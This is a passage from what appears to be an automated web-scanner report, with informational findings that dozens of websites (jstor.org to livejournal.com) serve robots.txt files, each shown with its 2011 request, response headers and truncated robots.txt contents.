Accept-Ranges: bytes
Content-Length: 368
Connection: close
Content-Type: text/plain; charset=UTF-8

# jobsonline.net

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Allow: /
Disallow: /browse/index.html
Disallow: /jobs/index.html
Disallow: /misc/cookie_warning
Disallow: /misc/logout
Disa
...[SNIP]...

24.452. http://www.jstor.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jstor.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jstor.org

Response

HTTP/1.0 200 OK
Set-Cookie: TENACIOUS=R1785643775; path=/
Server: AtyponWS/7.2
Cache-Control: no-cache
Pragma: no-cache
X-Webstats-RespID: c8cdb6634ea3e740e507d557386a55a4
Set-Cookie: SERVER=192.168.52.104:6085; path=/
Set-Cookie: SERVER=192.168.52.104:6085; domain=.www.jstor.org; path=/
Set-Cookie: JSESSIONID=babdbc9haXIcHS7L-PhgI; domain=.www.jstor.org; path=/
Set-Cookie: JSESSIONID=babdbc9haXIcHS7L-PhgI; path=/
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:05:27 GMT

User-agent: *
Disallow: /

24.453. http://www.jtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jtv.com

Response

HTTP/1.0 200 OK
Server: Demandware eCommerce Server
Last-Modified: Thu, 31 Mar 2011 17:58:19 GMT
Content-Type: text/plain
Cache-Control: max-age=25342
Expires: Sat, 02 Apr 2011 21:22:14 GMT
Date: Sat, 02 Apr 2011 14:19:52 GMT
Content-Length: 71
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.jtv.com/sitemap_index.xml

24.454. http://www.justanswer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justanswer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.justanswer.com

Response

HTTP/1.0 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 02 Apr 2011 13:25:43 GMT
ETag:
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:43 GMT
Content-Length: 1288
Connection: close
Set-Cookie: ARPT=JLPWYQS192.168.1.42CKMQK; path=/

Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /sites/
Disallow: /themes/
# Files
Disallow: /CHANG
...[SNIP]...

24.455. http://www.justin.tv/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justin.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.justin.tv

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Fri, 01 Apr 2011 23:54:55 GMT
Date: Sat, 02 Apr 2011 13:33:28 GMT
Content-Length: 351
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
Sitemap: http://www.justin.tv/sitemaps/index.xml

User-Agent: *
Disallow: /sharing/
Disallow: /*/vid
...[SNIP]...

24.456. http://www.justluxe.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justluxe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.justluxe.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 11 Nov 2010 22:45:06 GMT
ETag: "26401e-b7-494ceb9aae080"
Accept-Ranges: bytes
Content-Length: 183
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /reports/
Disallow: /includes/
Disallow: /modules/
Disallow: /oasjs/
Disallow: /phpThumb/
Disallow: /twatch/
Disallow: /terms/
Disallow: /newsletter/

24.457. http://www.kaboodle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaboodle.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Mon, 01-Apr-2013 13:30:56 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22880%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID=B295363930ADD027645A7F99B88EC5F4; Path=/
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 719
Date: Sat, 02 Apr 2011 13:30:56 GMT
Connection: close

User-agent: Sosospider
Disallow: /
User-agent: Tailrank
Disallow: /pg
User-agent: *
Disallow: /za/search
Disallow: /za/editprofile
Disallow: /za/addpage
Disallow: /za/pagebadge
Disallow: /za/browse
Di
...[SNIP]...

24.458. http://www.kaboose.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaboose.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:44 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
Last-Modified: Thu, 12 Aug 2010 19:11:23 GMT
ETag: "1c4605-a3-48da521cc4cc0"
Accept-Ranges: bytes
Content-Length: 163
Keep-Alive: timeout=5, max=90
Connection: close
Content-Type: text/plain
X-UA-COMPATIBLE: IE=EmulateIE7

User-agent: *
Disallow: /ads/
Disallow: /cgi/
Disallow: /cgi-bin/
Disallow: /familytravel/travelRedirect.php
Disallow: /include/
Disallow: /php/
Disallow: /akamai

24.459. http://www.kaspersky.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaspersky.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaspersky.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:56:17 GMT
Content-Type: text/plain; charset=iso-8859-1
Connection: close
Vary: Accept-Encoding
X-Showed: kaspen:kav:kavxrub=207716678
P3P: CP="IDC DSP COR LAW CUR DEV TAIo PSA PSD IVDi CONi OUR DEL IND PUR NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: uid=AAAAA02XKwGv+6cfDs/7Ag==; path=/


User-agent: *
Disallow:

24.460. http://www.kayak.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayak.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kayak.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 31 Mar 2011 00:07:03 GMT
Content-Type: text/plain; charset=UTF-8
Vary: Host
Date: Sat, 02 Apr 2011 13:34:54 GMT
Content-Length: 887
Connection: close
Set-Cookie: Apache=rcHW8w-AAABLxZsaog-00-LJhFbQ; path=/; expires=Fri, 27-Dec-13 13:34:54 GMT; domain=.kayak.com

# $Id: robots.txt.kayak.prod,v 1.23 2010-12-07 18:28:50 jleve Exp $
# $Source: /disk2/v/cvs-backup/nucleus/ui/kayak/robots.txt.kayak.prod,v $

# kayak.com robots.txt for production

User-agent: *
Disa
...[SNIP]...

24.461. http://www.kazaa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kazaa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kazaa.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 05:44:59 GMT
ETag: "1579739-64-49ea729736cc0"
Accept-Ranges: bytes
Content-Length: 100
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.kazaa.com/system/sitemaps/sitemap_index.xml.gz
User-agent: *
Disallow: /search/

24.462. http://www.kbb.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kbb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kbb.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000
Content-Type: text/plain
Last-Modified: Thu, 18 Feb 2010 23:34:04 GMT
Accept-Ranges: bytes
ETag: "0fe38dbf2b0ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:25 GMT
Connection: close
Content-Length: 3833
Set-Cookie: BIGipServerpool_kbb.com=1964053514.20480.0000; path=/

#9/23/2009 MM

User-Agent: *
Disallow: /javascript/
Disallow: /scripts/
Disallow: /*trid= # Used for PPC Tracking
Disallow: /*psid=
...[SNIP]...

24.463. http://www.kcom.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kcom.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:00 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Nov 2010 09:49:16 GMT
ETag: "38e04-1b-67021f00"
Accept-Ranges: bytes
Content-Length: 27
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /


24.464. http://www.kenexa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kenexa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kenexa.com

Response

HTTP/1.1 200 OK
Content-Length: 926
Content-Type: text/plain
Last-Modified: Fri, 04 Dec 2009 20:38:16 GMT
Accept-Ranges: bytes
ETag: "1ab4ddb42175ca1:3be"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:20:08 GMT
Connection: close

User-Agent: *
Allow: /

Disallow: /_cache/
Disallow: /_includes/
Disallow: /App_Browsers/
Disallow: /App_Code/
Disallow: /App_Data/
Disallow: /App_Themes/
Disallow: /App_WebReferences/
Disal
...[SNIP]...

24.465. http://www.killerstartups.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.killerstartups.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.killerstartups.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:32:41 GMT
Content-Type: text/plain
Content-Length: 616
Last-Modified: Thu, 31 Mar 2011 19:02:47 GMT
Connection: close
Accept-Ranges: bytes

Sitemap: http://www.killerstartups.com/sitemap_index4.xml

User-agent: *
Disallow: /admin/
Disallow: /afs/
Disallow: /ajax/
Disallow: /badge/
Disallow: /cache/
Disallow: /css/
Disallow: /data/
Disallo
...[SNIP]...

24.466. http://www.king.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.king.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.king.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:45 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 09:12:11 GMT
Accept-Ranges: bytes
Content-Length: 260
Vary: Accept-Encoding
Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
Connection: close
Content-Type: text/plain

User-agent: msnbot
Disallow: /community/profile.jsp

User-agent: bingbot
Disallow: /community/profile.jsp

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /intermission.jsp
Disallo
...[SNIP]...

24.467. http://www.kmart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kmart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kmart.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "ebad46e1b6ab4eec860a2d63e9e19313:1285282266"
Last-Modified: Thu, 23 Sep 2010 22:51:06 GMT
Content-Type: text/plain
Cache-Control: max-age=580528
Expires: Sat, 09 Apr 2011 06:43:37 GMT
Date: Sat, 02 Apr 2011 13:28:09 GMT
Content-Length: 2450
Connection: close

# /robots.txt file for http://www.kmart.com
# Version 09/23/10

User-agent: *
Disallow: /*10175
Disallow: /*10154
Disallow: /*10153
#Gift Registry
Disallow: /shc/s/CallGiftRegistryAnnouncementFormView
...[SNIP]...

24.468. http://www.kodak.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kodak.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kodak.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:42:08 GMT
Content-Length: 6250
Connection: close

User-agent: Googlebot
Disallow:    whereiam.jhtml
User-agent: *

Disallow: *hse_support*
Disallow:    /cgi-bin/
Disallow:    /exit
Disallow:    /cache/
Disallow: *CID=*
Disallow: *UV=*
Disallo
...[SNIP]...

24.469. http://www.kodakgallery.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kodakgallery.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kodakgallery.com

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=0DBFD5CDC93E268FDE7706EA4F7B97D7.ecom403_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=600019816903; Domain=kodakgallery.com; Expires=Mon, 02-May-2011 13:33:58 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1161408490@kodakgallery.com; Domain=kodakgallery.com; Path=/
Cache-Control: no-cache, no-store
Expires: -1
Content-Type: text/plain;charset=ISO-8859-1
Date: Sat, 02 Apr 2011 13:33:57 GMT
Connection: close
Server: ecom403

# Domain:[usgallery]
# KODAK Gallery
#
# This file should only reside in the kodakgallery.com/robots.txt
#
# Tells Scanning Robots Where They Are And Are Not Welcome
# User-agent: can also specify
...[SNIP]...

24.470. http://www.kraftrecipes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kraftrecipes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kraftrecipes.com

Response

HTTP/1.0 200 OK
Content-Length: 419
Content-Type: text/plain
Content-Location: http://www.kraftrecipes.com/robots.txt
Last-Modified: Mon, 25 Oct 2010 15:10:53 GMT
Accept-Ranges: bytes
ETag: "a23fe3d05674cb1:5897"
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6510
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:23:47 GMT
Connection: close

User-agent: *
Disallow: /CMS_Templates/
Disallow: /community/recipe-exchange/UserRecipes*
Disallow: /Community/recipe-exchange/UserRecipes*
Disallow: /Recipes/RecipeBox*
Disallow: /xmlfiles/hero_
...[SNIP]...

24.471. http://www.krillion.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krillion.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.krillion.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:59:23 GMT
ETag: "a04d-1c2-488a0cf113940"
Last-Modified: Wed, 09 Jun 2010 22:55:57 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Content-Length: 450
Connection: Close


User-agent: Diffbot
Disallow: /

User-agent: Discobot
Disallow: /

User-agent: EnaBot
Disallow: /

User-agent: Exabot
Disallow: /

User-agent: LocalcomBot
Disallow: /

User-agent: MJ12bot
Disallow: /
...[SNIP]...

24.472. http://www.lanebryant.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lanebryant.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lanebryant.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 15 Mar 2011 22:14:18 GMT
Accept-Ranges: bytes
Content-Length: 450
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Date: Sat, 02 Apr 2011 13:30:59 GMT
Connection: close

# robots.txt for Charming Shoppes

User-agent: *
Disallow: /assets
Disallow: /admin
Disallow: /checkout
Disallow: /css
Disallow: /custserv
Disallow: /includes
Disallow: /js
Disallow: /manager
Disallow
...[SNIP]...

24.473. http://www.last.fm/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.last.fm
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.last.fm

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:02 GMT
Server: Apache/1.3.39 (Unix)
X-Proxy-Fix-Up: headers fixed up
Last-Modified: Wed, 10 Mar 2010 18:01:27 GMT
ETag: "21d9-179-4b97de77"
Accept-Ranges: bytes
Content-Length: 377
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /music?
Disallow: /widgets/radio?
Disallow: /show_ads.php

Disallow: /affiliate/
Disallow: /affiliate_redirect.php
Disallow: /affiliate_sendto.php
Disallow: /affiliatelink.php

...[SNIP]...

24.474. http://www.latimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.latimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.latimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 148
Content-Type: text/plain
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Tue, 01 Sep 2009 02:01:30 GMT
ETag: "94-4a9c807a"
Cache-Control: private, max-age=219
Date: Sat, 02 Apr 2011 13:23:07 GMT
Content-Length: 148
Connection: close

User-agent: *
Disallow: *,email.*
Disallow: /search/
Disallow: /about/adops/
Disallow: /about/adops/hp/
Sitemap: http://www.latimes.com/sitemap.xml

24.475. http://www.legacy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.legacy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.legacy.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Sat, 02 Apr 2011 12:43:21 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Length: 4121
Content-Type: text/plain
Set-Cookie: ASPSESSIONIDCCQBSDTA=PBKDEMHDEIKBMBNGAIKCLADH; path=/
Cache-control: private

Sitemap: http://www.legacy.com/sitemap.xml

User-agent: Googlebot/
Disallow: /Images
Disallow: /Multimedia
Disallow: /Services/admina.asp
Disallow: /Services/adminc.asp
Disallow: /ObitNetworkDe
...[SNIP]...

24.476. http://www.letssingit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.letssingit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:03 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 05 Nov 2010 12:28:22 GMT
ETag: "c2825a-1f3-4944d69026580"
Accept-Ranges: bytes
Content-Length: 499
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Sitemap: http://artists.letssingit.com/sitemap_index.xml
Disallow: /cgi-exe/am.cgi?a=artists_song_lyrics_print&
Disallow: /cgi-exe/am.cgi?a=artists_song_lyrics_send_form&
Disallow: /
...[SNIP]...

24.477. http://www.levi.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.levi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.levi.com

Response

HTTP/1.0 200 OK
Content-Length: 76
Content-Type: text/plain
Last-Modified: Thu, 28 Aug 2008 22:38:10 GMT
Accept-Ranges: bytes
ETag: "0f56dbf5e9c91:125e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:25 GMT
Connection: close

# robots.txt for http://www.levi.com/

User-agent: *
Disallow: /common/

24.478. http://www.lg.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lg.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:44 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 08:47:46 GMT
ETag: "a0b5b-1aab-994b3080"
Accept-Ranges: bytes
Content-Length: 6827
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=86400
Via: 1.1 s0-kt10-sel (jaguar/3.0-11), 1.1 usmn02slh002 (jaguar/3.0-11)
Cache Result : HIT
Age: 19738
Connection: close

# Disallow all crawlers access to certain pages.

User-agent: *
Allow: /
Disallow: /error
Disallow: /common
Disallow: /templatedata
Disallow: /war
Disallow: /download/support/contactus
Disallow: /adm

...[SNIP]...

24.479. http://www.life123.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.life123.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.life123.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:47 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 04:00:47 GMT
Accept-Ranges: bytes
Content-Length: 564
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: Googlebot
Disallow: /afc-match

User-agent: googlebot-image
Disallow: /afc-match

User-agent: googlebot-mobile
Disallow: /afc-match

User-agent: MSNBot
Disallow: /afc-match

User-agent: Sl
...[SNIP]...

24.480. http://www.lifescript.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifescript.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lifescript.com

Response

HTTP/1.0 200 OK
Content-Length: 871
Content-Type: text/plain
Last-Modified: Wed, 30 Mar 2011 21:24:58 GMT
Accept-Ranges: bytes
ETag: "f0201bec20efcb1:1b99"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO CNT COM CUR DEV DSP NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sat, 02 Apr 2011 13:37:57 GMT
Connection: close

...User-agent: * #Allows all bots

Disallow: /rewards/
Disallow: /search
Disallow: /css
Disallow: /js/
Disallow: /JavaScript/
Disallow: /Services
Disallow: /images/
Disallow: /html/
Disall
...[SNIP]...

24.481. http://www.lijit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lijit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:07 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n6 ( iad-agg-n25), ms iad-agg-n25 ( origin>CONN)
ETag: "248113-c1-49eace405ee00"
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:45:07 GMT
Age: 0
Content-Length: 193
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 17 Mar 2011 12:35:04 GMT
Connection: close

User-agent: *
Disallow: /pvs/
Disallow: /custom
Disallow: /search/
Disallow: /research/
Disallow: /informers
Disallow: /users/
Disallow: /res/images/empty.gif
Disallow: /swr
Disallow: /expert/

24.482. http://www.like.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.like.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.like.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Jun 2010 22:02:09 GMT
X-Like-Servetime: Servetime: D=682
Content-Type: text/plain
Vary: Host
Vary: User-Agent
Date: Sat, 02 Apr 2011 13:55:29 GMT
Content-Length: 806
Connection: close

User-Agent: *
Disallow: /hidden.py
Disallow: /lighting
Disallow: /lighting*
Disallow: /static/
Disallow: /*site:*
Disallow: /*color:*
Disallow: /*brand:*
Disallow: /*origin=*
Disallow: /*material:*
Di
...[SNIP]...

24.483. http://www.lingospot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lingospot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lingospot.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: LUI=e52362dc94358781; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1434326728"
Last-Modified: Mon, 04 May 2009 02:09:59 GMT
Content-Length: 72
Date: Sat, 02 Apr 2011 14:04:59 GMT
Server: lighttpd/1.4.15

User-agent: *
Allow: /
Sitemap: http://www.lingospot.com/sitemap.xml.gz

24.484. http://www.linkedin.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1426348071"
Last-Modified: Mon, 28 Mar 2011 03:54:15 GMT
Content-Length: 21229
Connection: keep-alive
Date: Sat, 02 Apr 2011 12:38:02 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

24.485. http://www.liutilities.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.liutilities.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.liutilities.com

Response

HTTP/1.1 200 OK
Content-Length: 71
Content-Type: text/plain
Content-Location: http://www.liutilities.com/robots.txt
Last-Modified: Wed, 01 Jul 2009 10:36:34 GMT
Accept-Ranges: bytes
ETag: "3ced4bce37fac91:10b4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:41:33 GMT
Connection: close

User-Agent: *
Allow: /

Sitemap: http://www.liutilities.com/sitemap.xml

24.486. http://www.livecams.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livecams.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livecams.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:11 GMT
Server: Apache
Content-Length: 38
Last-Modified: Sat, 05 Feb 2011 00:52:06 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: text/plain

user-agent: *
disallow: /myalerts.php

24.487. http://www.livejournal.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: cws06
Last-Modified: Thu, 26 Feb 2009 21:02:20 GMT
ETag: "12ffa1-1b6-463d8ab028f00"
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=UTF-8
X-Debug: USen (null) (null)
X-VWS-Id: bil1-varn05
Content-Length: 438
